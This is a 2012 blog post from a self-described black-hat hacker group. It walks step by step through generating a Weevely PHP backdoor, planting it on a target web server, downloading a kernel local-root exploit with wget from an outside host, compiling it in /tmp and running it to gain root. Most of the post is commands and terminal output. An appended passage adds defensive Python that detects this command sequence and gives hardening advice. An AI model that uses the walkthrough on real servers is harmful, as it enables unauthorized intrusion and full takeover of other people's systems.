Saturday 28 July 2012

R00ting a server With Weevely [BackDoor in BackTrack]


Hello friends, this is Maher Bro

Hello again guyz,

Today I'm going to show you how to R00t a server with Weevely in BackTrack.
First of all, open Weevely:
Menu > BackTrack > Maintaining Access > Web Backdoors > Weevely
Or
open a terminal and type:
root@root: cd /pentest/backdoors/web/weevely

############################################################

Now let's make our backdoor by typing:
root@root:./main.py -g -o /root/Desktop/backdoor.php -p password
By typing this command, we made a backdoor called 'backdoor.php' with the password 'password'.

++++++++++++++++++++++Commands We Need++++++++++++++++++++++++++
-g  = Generate backdoor
-o  = Output
-p  = Password
-u  = URL
-t  = start Terminal session
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Steps:

1. Uploading our backdoor & connecting to it.
2. Checking the kernel & finding a LocalR00t for it.
3. Compiling the LocalR00t.
4. Executing.
###########################################################################
Let's start:


Open your shell and upload the backdoor:

The link to the backdoor will be in the same place as the shell. For example:
www.target.com/uploads/shell.php           <== shell
www.target.com/uploads/backdoor.php   <== backdoor

Connect to the backdoor by typing:
 ./main.py -t -u http://www.target.com/uploads/backdoor.php -p password

root@root:/pentest/backdoors/web/weevely# ./main.py -t -u http://www.target.com/backdoor.php -p password
  Weevely 0.3 - Generate and manage stealth PHP backdoors.
  Copyright (c) 2011-2012 Weevely Developers
  Website: http://code.google.com/p/weevely/


+ Using method 'system()'.
+ Retrieving terminal basic environment variables .


[hacker@target.com/]
Now, to find the kernel version, type:
uname -a
[hacker@target.com/] uname -a
2.6.18 (example)


Now we have to find the localroot for that kernel on:
www.1337day.com
www.exploit-db.com
www.google.com
and some others..


Now we go to the directory /tmp/, coz it's always writeable.
Let's say the kernel was 2.6.18.
There are some ways to get the localroot:
uploading through the shell
wget method
curl
Now let me explain how each method works:


Of course you know how to upload through the shell :P


wget
wget www.exploit.com/2.6.18.c
curl
curl www.exploit.com/2.6.18.c -o new_name


For this tutorial we will use wget.




############################################




[hacker@target.com/tmp/]ls
file
file1
anything
[hacker@target.com/tmp/]wget www.exploit.com/2.6.18.c
--2012-01-29 05:43:37--  http://1337day.com/exploits/17158
Resolving exploitcom... 127.1.1
Connecting to exploit.com|127.1.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `2.6.18.c'


     0K .........                                               208M=0s


2012-01-29 05:43:38 (208 MB/s) - `2.6.18.c' saved [9396]
 [hacker@target.com/tmp/]ls
 2.6.18.c
 file
 file1
 anything
#############################################
OK, now the exploit is on the server. We have to compile it with this command:
gcc 2.6.18.c -o Maher
[hacker@target.com/tmp/]gcc 2.6.18.c -o Maher




[hacker@target.com/tmp/]ls
 2.6.18.c
 file
 file1
 anything
 Maher


++++++++++++++++
chmod 777 Maher
++++++++++++++++
[hacker@target.com/tmp/]chmod 777 Maher


++++++++++++++++
executing..
++++++++++++++++


[hacker@target.com/tmp/]./Maher
.
.
.
.
.
done!
[hacker@target.com/tmp/]id
uid=(root) gid=(root)


R00ted!

Now You Know How to Root :D CongratzZz

GretzZz To All : VOBHH

We Are Voice Of Black Hat Hackers
And This is The
Voice OF Black hat Hackers

Allah Hafiz, remember me in your prayers

Pakistan Zindabad
VOBHH Zindabad :D
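
Seen from the server side, the steps in this post leave a recognizable process trail: the web server's own account runs uname, a downloader, a compiler and chmod 777, then executes a binary out of /tmp. The following detection logic is an added example, not part of the original post; it runs over constructed key=value exec records (a simplified stand-in for process-audit telemetry), and the account names, field names, window and threshold are assumptions.

```python
import shlex

# Assumed names: typical web-server service accounts and world-writable dirs.
WEB_USERS = {"www-data", "apache", "nginx"}
WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
STAGE_BY_PROG = {"uname": "recon", "id": "recon", "wget": "fetch",
                 "curl": "fetch", "gcc": "compile", "cc": "compile"}

# Constructed sample records (simplified key=value format, not real auditd output).
SAMPLE_LOG = """\
ts=1001 user=www-data cwd=/var/www/uploads cmd="uname -a"
ts=1002 user=www-data cwd=/tmp cmd="wget www.exploit.com/2.6.18.c"
ts=1003 user=www-data cwd=/tmp cmd="gcc 2.6.18.c -o Maher"
ts=1004 user=www-data cwd=/tmp cmd="chmod 777 Maher"
ts=1005 user=www-data cwd=/tmp cmd="./Maher"
ts=1006 user=deploy cwd=/home/deploy cmd="gcc app.c -o app"
ts=1007 user=www-data cwd=/var/www cmd="convert in.png out.jpg"
"""

def in_writable_dir(path):
    return any(path == d or path.startswith(d + "/") for d in WRITABLE_DIRS)

def classify(rec):
    """Map one exec record to a stage of the sequence in the post, or None."""
    argv = rec["cmd"].split()
    prog = argv[0].rsplit("/", 1)[-1]
    if prog in STAGE_BY_PROG:
        return STAGE_BY_PROG[prog]
    if prog == "chmod" and "777" in argv[1:]:
        return "chmod777"
    if (argv[0].startswith("./") and in_writable_dir(rec["cwd"])) or in_writable_dir(argv[0]):
        return "exec_from_tmp"
    return None

def detect(log_text, window=600, threshold=3):
    """Return {user: stages} for web accounts with >= threshold distinct stages
    within `window` seconds of that account's most recent flagged event."""
    hits = {}
    for line in filter(str.strip, log_text.splitlines()):
        rec = dict(tok.split("=", 1) for tok in shlex.split(line))
        stage = classify(rec)
        if stage and rec["user"] in WEB_USERS:
            hits.setdefault(rec["user"], []).append((int(rec["ts"]), stage))
    alerts = {}
    for user, events in hits.items():
        last = max(ts for ts, _ in events)
        recent = {s for ts, s in events if last - ts <= window}
        if len(recent) >= threshold:
            alerts[user] = sorted(recent)
    return alerts
```

Mounting /tmp with noexec and keeping compilers off web hosts blocks the direct compile-and-run step; this check is for hosts where that hardening is not yet in place.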

2 comments:

SKY_WALKER said...

great! (Y)

Adnan Ansari said...

Make a video tutorial, man.